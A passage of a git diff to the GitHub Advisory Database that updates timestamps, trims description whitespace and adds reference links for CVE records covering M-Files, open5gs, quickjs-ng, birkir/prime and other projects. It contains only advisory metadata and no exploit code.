a/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json +++ b/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-r2vj-428g-v68v", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-10-20T09:30:28Z", "aliases": [ "CVE-2023-5524" ], - "details": "Insufficient blacklisting in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution\n\n via specific file types\n\n", + "details": "Insufficient blacklisting in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution\n\n via specific file types", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5524" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-5524" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-5524" diff --git a/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json b/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json index 98d1d53622cfa..9fc5c62753d7a 100644 --- a/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json +++ b/advisories/unreviewed/2023/11/GHSA-cccf-mjv6-phwq/GHSA-cccf-mjv6-phwq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cccf-mjv6-phwq", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-11-22T12:30:26Z", "aliases": [ "CVE-2023-6117" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6117" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-6117" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-6117" diff --git a/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json b/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json index 016fab859039b..ccbc89da141ff 100644 --- a/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json +++ b/advisories/unreviewed/2023/11/GHSA-v3xm-8fcm-8j8q/GHSA-v3xm-8fcm-8j8q.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-v3xm-8fcm-8j8q", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-11-22T12:30:26Z", "aliases": [ "CVE-2023-6189" ], - "details": "\nMissing access permissions checks\n\n in the M-Files server before 23.11.13156.0 allow attackers to perform data write and export\n\njobs using the M-Files API methods.", + "details": "Missing access permissions checks\n\n in the M-Files server before 23.11.13156.0 allow attackers to perform data write and export\n\njobs using the M-Files API methods.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6189" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-6189" + }, { "type": "WEB", "url": "https://https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6189" diff --git a/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json b/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json index e408b0b01e999..aea4e76bccfed 100644 --- a/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json +++ b/advisories/unreviewed/2023/11/GHSA-xjc5-m98p-6f2c/GHSA-xjc5-m98p-6f2c.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-xjc5-m98p-6f2c", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-11-28T15:30:22Z", "aliases": [ "CVE-2023-6239" ], - "details": "Improperly calculated effective permissions in M-Files Server versions 23.9 and 23.10 and 23.11 before 23.11.13168.7 could produce a faulty result if an object used a specific configuration of metadata-driven permissions.\n", + "details": "Improperly calculated effective permissions in M-Files Server versions 23.9 and 23.10 and 23.11 before 23.11.13168.7 could produce a faulty result if an object used a specific configuration of metadata-driven permissions.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6239" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-6239" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-6239" diff --git a/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json b/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json index d75a5de668800..f9721f7271c64 100644 --- a/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json +++ b/advisories/unreviewed/2023/12/GHSA-4mcp-5qpc-wgf8/GHSA-4mcp-5qpc-wgf8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4mcp-5qpc-wgf8", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-12-20T12:30:26Z", "aliases": [ "CVE-2023-6910" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6910" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-6910" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-6910" diff --git a/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json b/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json index 8c6b85614ce17..51b63bedf2f40 100644 --- a/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json +++ b/advisories/unreviewed/2024/03/GHSA-r32c-fmcr-34r3/GHSA-r32c-fmcr-34r3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r32c-fmcr-34r3", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2024-03-04T09:30:29Z", "aliases": [ "CVE-2023-4479" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4479" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-4479" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-4479" diff --git a/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json b/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json index 71f1353325dc0..1ee415154ade0 100644 --- a/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json +++ b/advisories/unreviewed/2026/01/GHSA-25w3-vxr6-gm5r/GHSA-25w3-vxr6-gm5r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-25w3-vxr6-gm5r", - "modified": "2026-01-19T18:30:28Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T18:30:28Z", "aliases": [ "CVE-2026-1169" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/547" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341763" diff --git a/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json b/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json index 9d3e16f92cf3b..410c8bf7179db 100644 --- a/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json +++ b/advisories/unreviewed/2026/01/GHSA-27fq-8xxm-gqgw/GHSA-27fq-8xxm-gqgw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-27fq-8xxm-gqgw", - "modified": "2026-01-17T18:30:19Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T18:30:19Z", "aliases": [ "CVE-2025-15532" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/c7c131f8d2cb1195ada5e0e691b6868ebcd8a845" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341599" @@ -54,6 +58,18 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.729357" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.735340" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.735341" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.735342" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json b/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json index fd9c6eca6019d..299e8ffdf1838 100644 --- a/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json +++ b/advisories/unreviewed/2026/01/GHSA-29jx-3q54-p8gq/GHSA-29jx-3q54-p8gq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-29jx-3q54-p8gq", - "modified": "2026-01-17T00:30:24Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T00:30:24Z", "aliases": [ "CVE-2025-15528" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/98f76e98df35cd6a35e868aa62715db7f8141ac1" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341595" @@ -46,6 +50,18 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.728128" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.729359" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.729360" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.738373" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json b/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json index 2596de30d57dd..d1766ade7b25f 100644 --- a/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json +++ b/advisories/unreviewed/2026/01/GHSA-2gmr-vqp5-r9qg/GHSA-2gmr-vqp5-r9qg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gmr-vqp5-r9qg", - "modified": "2026-01-19T09:30:27Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T09:30:27Z", "aliases": [ "CVE-2026-1144" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/quickjs-ng/quickjs/commit/ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141" }, + { + "type": "WEB", + "url": "https://github.com/quickjs-ng/quickjs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341737" diff --git a/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json b/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json index 2bdc679869d05..687a9b6511226 100644 --- a/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json +++ b/advisories/unreviewed/2026/01/GHSA-2m9v-rwcf-g57m/GHSA-2m9v-rwcf-g57m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2m9v-rwcf-g57m", - "modified": "2026-01-17T18:30:20Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T18:30:20Z", "aliases": [ "CVE-2026-1049" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/LigeroSmart/ligerosmart/issues/280#issue-3776580352" }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341601" @@ -42,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.729402" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.746919" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json b/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json index e3ba5eb0f16a7..a85616cd1c4e9 100644 --- a/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json +++ b/advisories/unreviewed/2026/01/GHSA-2qfg-m3c3-m867/GHSA-2qfg-m3c3-m867.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2qfg-m3c3-m867", - "modified": "2026-01-07T12:31:25Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-07T12:31:25Z", "aliases": [ "CVE-2026-0642" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.732369" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.736161" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json b/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json index b6f3dadf88902..d81b5d7ba13d8 100644 --- a/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json +++ b/advisories/unreviewed/2026/01/GHSA-359g-wg43-pfv8/GHSA-359g-wg43-pfv8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-359g-wg43-pfv8", - "modified": "2026-01-17T18:30:19Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T18:30:19Z", "aliases": [ "CVE-2025-15531" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/issues/4233#issue-3776216182" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341598" diff --git a/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json b/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json index be0e567b971d2..9b576af8404ba 100644 --- a/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json +++ b/advisories/unreviewed/2026/01/GHSA-3vj5-3fjj-88m8/GHSA-3vj5-3fjj-88m8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3vj5-3fjj-88m8", - "modified": "2026-01-17T12:31:25Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T12:31:25Z", "aliases": [ "CVE-2025-15530" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/issues/4231#issue-3774187007" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341597" diff --git a/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json b/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json index 35cec6fb92bf9..63a6df2e31afe 100644 --- a/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json +++ b/advisories/unreviewed/2026/01/GHSA-4696-58w6-rqw4/GHSA-4696-58w6-rqw4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4696-58w6-rqw4", - "modified": "2026-01-18T09:30:27Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T09:30:27Z", "aliases": [ "CVE-2025-15534" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/oneafter/1224/blob/main/segv1" }, + { + "type": "WEB", + "url": "https://github.com/raysan5/raylib" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341706" diff --git a/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json b/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json index b330a038420b9..b2401ba6b6798 100644 --- a/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json +++ b/advisories/unreviewed/2026/01/GHSA-4mf2-6634-xrph/GHSA-4mf2-6634-xrph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4mf2-6634-xrph", - "modified": "2026-01-17T00:30:24Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T00:30:24Z", "aliases": [ "CVE-2025-15529" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/b19cf6a2dbf5d30811be4488bf059c865bd7d1d2" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341596" @@ -46,6 +50,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.728130" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.738372" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json b/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json index cbea30bc55efb..0947787c65125 100644 --- a/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json +++ b/advisories/unreviewed/2026/01/GHSA-4p7v-9jxw-m3mp/GHSA-4p7v-9jxw-m3mp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4p7v-9jxw-m3mp", - "modified": "2026-01-28T18:30:48Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-28T18:30:48Z", "aliases": [ "CVE-2026-1522" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/b19cf6a" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343193" diff --git a/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json b/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json index f6dc0f1611847..856e715a3d6b4 100644 --- a/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json +++ b/advisories/unreviewed/2026/01/GHSA-5j8r-5f3r-4w9p/GHSA-5j8r-5f3r-4w9p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5j8r-5f3r-4w9p", - "modified": "2026-01-26T06:30:28Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T06:30:28Z", "aliases": [ "CVE-2026-1418" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/enocknt/gpac/commit/10c73b82cf0e367383d091db38566a0e4fe71772" }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342807" diff --git a/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json b/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json index e847853348742..c80591ab94fd1 100644 --- a/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json +++ b/advisories/unreviewed/2026/01/GHSA-67vh-536w-6pc4/GHSA-67vh-536w-6pc4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-67vh-536w-6pc4", - "modified": "2026-01-10T15:31:22Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-10T15:31:22Z", "aliases": [ "CVE-2026-0822" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/quickjs-ng/quickjs/commit/53eefbcd695165a3bd8c584813b472cb4a69fbf5" }, + { + "type": "WEB", + "url": "https://github.com/quickjs-ng/quickjs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.340356" diff --git a/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json b/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json index e7dd76696742e..a83a2e7658386 100644 --- a/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json +++ b/advisories/unreviewed/2026/01/GHSA-6cvf-4x5f-rv59/GHSA-6cvf-4x5f-rv59.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6cvf-4x5f-rv59", - "modified": "2026-01-29T15:30:27Z", + "modified": "2026-02-23T09:31:23Z", "published": "2026-01-29T15:30:27Z", "aliases": [ "CVE-2026-1586" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/issues/4273#issue-3796030721" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343349" diff --git a/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json b/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json index 0327682f12676..3f946500be950 100644 --- a/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json +++ b/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6fpp-9pqw-wr8m", - "modified": "2026-01-05T03:30:27Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-05T03:30:27Z", "aliases": [ "CVE-2025-15454" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://gist.github.com/youremailaddress/cba7c19a4eafcb326d0e912adf132be3#proof-of-concept" }, + { + "type": "WEB", + "url": "https://github.com/zhanglun/lettura" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339487" diff --git a/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json b/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json index 35b81587bb40d..5f07840377a20 100644 --- a/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json +++ b/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6q3r-7qmf-2jrm", - "modified": "2026-01-02T09:30:27Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T09:30:27Z", "aliases": [ "CVE-2025-15437" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/LigeroSmart/ligerosmart/commit/264ac5b2be5b3c673ebd8cb862e673f5d300d9a7" }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart" + }, { "type": "WEB", "url": "https://github.com/LigeroSmart/ligerosmart/releases/tag/6.1.26" diff --git a/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json b/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json index 5954cdd08b1d6..1b0ed1059d4fd 100644 --- a/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json +++ b/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-74rr-mvxh-jvg7", - "modified": "2026-01-19T21:33:11Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T21:33:11Z", "aliases": [ "CVE-2026-1172" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/543" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341766" diff --git a/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json b/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json index 8da702d5e6782..af0422f0f3604 100644 --- a/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json +++ b/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-79xr-h873-2v98", - "modified": "2026-01-19T21:33:12Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-19T21:33:11Z", "aliases": [ "CVE-2026-1174" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/545" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341768" diff --git a/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json b/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json index 28466fcb95fd9..2a5ed9b0b89d3 100644 --- a/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json +++ b/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7x8v-q8wp-hcg7", - "modified": "2026-01-19T21:33:11Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-19T21:33:11Z", "aliases": [ "CVE-2026-1173" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/544" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341767" diff --git a/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json b/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json index 667e29df1da16..d86e534f394e4 100644 --- a/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json +++ b/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8gqc-w5g5-j344", - "modified": "2026-01-28T15:31:31Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-28T15:31:31Z", "aliases": [ "CVE-2026-1521" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/69b53add90a9479d7960b822fc60601d659c328b" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343192" diff --git a/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json b/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json index 3c0033f3cd89d..cb8d36e2c3a47 100644 --- a/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json +++ b/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8whh-2x7g-j9cx", - "modified": "2026-01-18T18:30:16Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T18:30:16Z", "aliases": [ "CVE-2026-1125" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.734966" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.743503" + }, { "type": "WEB", "url": "https://www.dlink.com" diff --git a/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json 